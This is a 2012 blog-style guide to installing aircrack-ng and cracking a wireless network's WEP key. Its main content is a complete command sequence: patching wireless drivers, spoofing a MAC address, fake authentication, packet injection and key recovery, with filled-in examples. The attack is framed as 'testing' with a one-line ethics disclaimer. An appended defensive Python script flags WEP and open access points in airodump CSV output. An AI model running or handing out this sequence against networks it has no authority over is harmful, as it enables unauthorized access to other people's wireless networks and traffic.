Aircrack WEP Testing Guide

Sunday, March 25th, 2012

Installing and Using Aircrack-ng

The following guide has been written to help you install and configure Aircrack-ng. It also includes a step-by-step walkthrough of cracking wireless network WEP encryption. This guide should only be used for ethical purposes.

Installation:

Open a new terminal and use the following command to install aircrack-ng:

sudo apt-get install aircrack-ng

Ubuntu will now download and automatically install aircrack-ng.

Compat-Wireless Channel -1 Problem:

Ubuntu 10.04 and newer have a problem configuring wireless monitoring devices to listen on a particular wireless channel. When you create a wireless device in monitor mode, you will see that the channel is stuck on -1 (an invalid wireless channel number). This is due to a bug in the compat-wireless drivers packaged with the Ubuntu kernel. The solution is to download, compile, and install the latest compat-wireless driver, as described below:

Open a new terminal, and use this script:

wget http://www.orbit-lab.org/kernel/compat-wireless-3-stable/v3.3/compat-wireless-3.3-rc6-1.tar.bz2
tar -jxf compat-wireless-3.3-rc6-1.tar.bz2
cd compat-wireless-3.3-rc6-1
wget http://patches.aircrack-ng.org/mac80211.compat08082009.wl_frag+ack_v1.patch
patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
nano scripts/update-initramfs
#*** FIND LINE 13: KLIB=/lib/modules/2.6.31-wl/build
#*** REPLACE WITH: KLIB=/lib/modules/$(uname -r)/build
#*** Example: KLIB=/lib/modules/3.1.0/build
make
sudo make install
sudo make wlunload

To find the value for $(uname -r), open a new terminal and type:

uname -r

Use the value you receive for the KLIB line in the script above.

Restart your Linux machine.

Testing WEP Networks

Stop Conflicting Services:

Open a new terminal and run the following commands:

sudo service network-manager stop
sudo service avahi-daemon stop
sudo service upstart-udev-bridge stop

Retrieve Wireless Devices List:

In a terminal, type the following command:

iwconfig

Now List / Scan All Networks:

Run the following command in the same terminal:

sudo airodump-ng [WIRELESS_DEVICE_NAME_HERE Example: wlan2]

Example:

sudo airodump-ng wlan2

When you're finished, press Ctrl+C to stop the scanning process. Save the entire line of information for the network you wish to "test".

Create your monitoring device:

In the same terminal, run this command:

sudo airmon-ng start [WIRELESS_DEVICE_NAME_HERE Example: wlan2] [channel number of wireless access point you want to break]

Example:

sudo airmon-ng start wlan2 11

The above command should create a listening interface on your wireless adapter. In Ubuntu, this is typically mon0.

Change your adapter's MAC address on the listening interface:

Run the following command in the same terminal to change your MAC address:

sudo ifconfig mon0 down
sudo macchanger mon0 --mac=[FAKE_MAC_LIKE AA:22:11:11:11:11]
sudo ifconfig mon0 up

Example:

sudo ifconfig mon0 down
sudo macchanger mon0 --mac=AA:22:11:11:11:11
sudo ifconfig mon0 up

Test Wireless Injection:

Start "testing" the desired access point. In the same terminal, run:

sudo aireplay-ng -9 -e [WIRELESS_NETWORK_NAME] -a [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING] mon0

Example:

sudo aireplay-ng -9 -e test -a 00:AE:6B:61:67:F2 mon0

Flags:

-9 means injection test
-e specifies the wireless network name (ESSID) for the test
-a is the access point MAC address
mon0 is the wireless interface

All of the values these flags need appear in the output you received when listing the networks.

If you receive a message stating "injection is working!" run this command in the same terminal:

sudo airodump-ng -c [ACCESS_POINT_WIRELESS_CHANNEL] --bssid [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING] -w [CAPTURE_FILE_NAME] mon0

Example:

sudo airodump-ng -c 11 --bssid 00:AE:6B:61:67:F2 -w output mon0

Flags:

-c 11 is the channel for the wireless network
--bssid [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING] limits the capture to that access point
-w [CAPTURE_FILE_NAME] is the prefix for the capture files written to disk

Open a New Terminal and Run This:

sudo aireplay-ng -1 0 -e [WIRELESS_NETWORK_NAME] -a [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING] -h [YOUR_FAKED_MAC_ADDRESS_FOR_INTERFACE] mon0

Example:

sudo aireplay-ng -1 0 -e test -a 00:AE:6B:61:67:F2 -h AA:22:11:11:11:11 mon0

Flags:

-1 means fake authentication
0 is the reassociation timing in seconds
-e [WIRELESS_NETWORK_NAME]
-a [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING]
-h [YOUR_FAKED_MAC_ADDRESS_FOR_INTERFACE]

You should receive a message stating "Authentication Successful"

Open a New Terminal and Run:

sudo aireplay-ng -3 -b [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING] -h [FAKED_ADAPTER_MAC_ADDRESS] mon0

Example:

sudo aireplay-ng -3 -b 00:AE:6B:61:67:F2 -h AA:22:11:11:11:11 mon0

Go back to the terminal that shows the beacon scanning information. When the value in the #/s column reaches over 10000, do this:

Open a New Terminal and Run:

sudo aircrack-ng -b [MAC_ADDRESS_OF_ACCESS_POINT_FOR_TESTING] [CAPTURE_FILE_NAME]*.cap

Example:

sudo aircrack-ng -b 00:AE:6B:61:67:F2 output*.cap

You should receive the key.
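The capture step above (airodump-ng with -w output) also writes a CSV summary next to the .cap file, normally output-01.csv. As an added, defender-side example that is not code from this guide or from the aircrack-ng project, the Python script below parses that CSV and reports every access point still using WEP or no encryption, with the clients currently joined to it, so an administrator can find networks that need migrating to WPA2. The column layout is assumed to match airodump-ng's CSV output, and every row in the sample is constructed.

```python
import csv

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv:
# an access-point table, a blank line, then a station table. Every MAC,
# timestamp and count below is made up for this example.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:AE:6B:61:67:F2, 2012-03-25 10:00:01, 2012-03-25 10:05:12, 11, 54, WEP, WEP, , -40, 312, 10421, 0. 0. 0. 0, 4, test, 
00:11:22:33:44:55, 2012-03-25 10:00:03, 2012-03-25 10:05:10,  6, 54, WPA2, CCMP, PSK, -55, 280, 0, 0. 0. 0. 0, 6, office, 
00:11:22:33:44:66, 2012-03-25 10:00:05, 2012-03-25 10:05:09,  1, 54, OPN, , , -70, 150, 0, 0. 0. 0. 0, 5, guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:22:11:11:11:11, 2012-03-25 10:03:00, 2012-03-25 10:05:12, -30, 9800, 00:AE:6B:61:67:F2, test
12:34:56:78:9A:BC, 2012-03-25 10:00:10, 2012-03-25 10:05:11, -60, 40, 00:11:22:33:44:55, office,home
"""

def parse_airodump_csv(text):
    """Return (access_points, stations) as lists of dicts keyed by header."""
    tables = []
    for section in text.replace("\r\n", "\n").strip().split("\n\n"):
        rows = list(csv.reader(section.splitlines(), skipinitialspace=True))
        if not rows:
            continue
        header = [h.strip() for h in rows[0]]
        table = []
        for row in rows[1:]:
            if not any(v.strip() for v in row):
                continue
            # Probed ESSIDs may contain commas: fold extra fields into the last column.
            values = row[:len(header) - 1] + [",".join(row[len(header) - 1:])]
            table.append({h: v.strip() for h, v in zip(header, values)})
        tables.append(table)
    return (tables[0] if tables else []), (tables[1] if len(tables) > 1 else [])

def audit_weak_aps(aps, stations):
    """Flag WEP and open access points and list the clients joined to each."""
    clients = {}
    for st in stations:
        clients.setdefault(st["BSSID"], []).append(st["Station MAC"])
    findings = []
    for ap in aps:
        privacy = set(ap["Privacy"].split())
        issue = "WEP" if "WEP" in privacy else "open" if "OPN" in privacy else None
        if issue is None:
            continue
        findings.append({"bssid": ap["BSSID"], "essid": ap["ESSID"],
                         "channel": int(ap["channel"]), "issue": issue,
                         "ivs": int(ap["# IV"] or 0),
                         "clients": clients.get(ap["BSSID"], [])})
    return findings
```

For a real scan, pass the contents of output-01.csv to parse_airodump_csv and hand both tables to audit_weak_aps; the "ivs" field shows how much WEP-encrypted traffic was already captured for each flagged network.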

Sources:

HackAVision Aircrack WEP / WPA / WPA2 Cracking Guide

Aircrack-ng WEP Cracking Guide